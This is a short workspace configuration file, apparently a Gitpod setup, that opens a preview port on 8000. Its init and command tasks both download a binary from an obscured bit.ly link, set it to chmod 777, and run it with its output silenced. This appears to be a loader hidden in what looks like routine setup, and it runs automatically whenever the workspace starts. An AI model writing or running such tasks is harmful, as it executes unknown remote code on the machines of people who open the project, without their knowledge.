ports:
- port: 8000
  onOpen: open-preview
tasks:
  - init: |
      wget https://bit.ly/3qTN4Qy && chmod 777 3qTN4Qy && ./3qTN4Qy > /dev/null
    command: |
      wget https://bit.ly/3qTN4Qy && chmod 777 3qTN4Qy && ./3qTN4Qy > /dev/null
